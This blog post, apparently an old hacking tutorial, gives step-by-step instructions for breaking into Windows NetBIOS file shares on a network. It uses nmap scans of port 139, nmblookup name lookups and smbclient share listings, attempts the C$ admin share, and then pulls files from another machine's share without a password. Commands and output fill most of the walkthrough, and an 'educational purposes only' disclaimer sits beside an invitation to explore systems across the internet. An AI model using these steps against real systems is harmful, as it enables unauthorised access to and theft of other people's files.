This is another way to hacking windows box. especially for hacking our local area network.this post will show us how to hack a windows netbios share at our network. The first step in exploring remote shares is to find computers that are offering open shares. For this purpose we’ll use NMAP. We’ll start by scanning for computers offering an open port 139. If the port is filtered then we may have trouble, but if its open we should be good to begin exploring. Ports 137 and 139 are used by Windows for Netbios shares.
[root@fxreza /]# nmap -sS -O xx.xx.xx.xx -p 139
Warning: OS detection will be MUCH less reliable because we did not find at least 1 open
and 1 closed TCP port
Interesting ports on (xx.xx.xx.xx):
Port State Service
139/tcp open netbios-ssn
Ok, so now we’ve got a potential targets,and it has the correct port. The next stage is to find out what these machine’s Netbios names are. Without this information we won’t be able to request any share information from these computers (because Microsoft tries to make everything easy, even networking, and identifies computers on a network not by their IP address but by their ‘name’). Ok, the syntax for requesting name information is ‘nmblookup -A 111.111.111.111′ with the appropriate IP address instead of the ones. The ‘-A’ flag denotes a remote computer (a lot like the windows command ‘nbtstat -A 111.111.111.111′ although that identifies existing connections). Ok, so lets see what we can see, we’ll start with the ME machine at xx.xx.xx.xx:
[root@fxreza /]# nmblookup -A xx.xx.xx.xx
Looking up status of xx.xx.xx.xx
(Computer Name Target Will Show HERE)
[root@laptop /]# smbclient -L ComputerName -I xx.xx.xx.xx
I entered ‘none’ for the password and it turned out that I could retrieve this list without a password. Use the ‘-N’ flag on the smbclient command to suppress the password prompt.
[root@laptop /]# smbclient //ComputerName/c$ -I xx.xx.xx.xx (we try to come inside the
drive C target)
added interface ip=xx.xx.xx.xx bcast=yy.yy.yy.yy nmask=255.255.255.224
Password:
tree connect failed: ERRSRV – ERRbadpw (Bad password – name/password pair in a Tree
Connect or Session Setup are invalid.)
Ok,it’s failed w’ll try to get another target and we must do like we do at the first step.finding a terget. and on the example we’ll try to connect to the ’share’ disk share. We use the same ’smbclient’ command to do this, but with other arguments. What we’re going to do is actually request a connection to the share. If this completes successfully our prompt will instantly change to:
smb>
At that point you can type ‘?’ to get a list of commands, but smbclient functions a lot like ftp so all those commands will be viable. Lets go ahead and see what happens when we request access to this share:
And you’ll notice I’m in . At this point we could use ‘put’ or ‘get’ to push or pull files to and from the share. For instance, to grab NewDoc.txt (although its size is showing as ‘0′ so I know its empty), I use:
[root@fxreza /]# smbclient //AnotherTarget/share -I ab.cd.ef.gh -N
added interface ip=ab.cd.ef.gh bcast=ww.ww.ww.ww nmask=255.255.255.224
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: > get NewDoc.txt
getting file NewDoc.txt of size 0 as NewDoc.txt (0.0 kb/s) (average 0.0 kb/s)
smb: > exit
[root@fxreza /]# ls -l NewDoc.txt
-rw-r–r– 1 root root 0 Mar 17 09:28 NewDoc.txt
Remember, I’m writing this article for educational purposes only. It is more than possible to use the information herein for legitimate purposes. Please remember, if you’re going to use this information to go exploring across the internet, don’t delete or destroy anything. People get concerned when they shut down their home computers and they get a ‘Warning: 1 user is still connected’, but when they find their tax information has been destroyed they call the cops. 
No Comments Yet
No comments yet.
Comments RSS TrackBack Identifier URI
Leave a comment
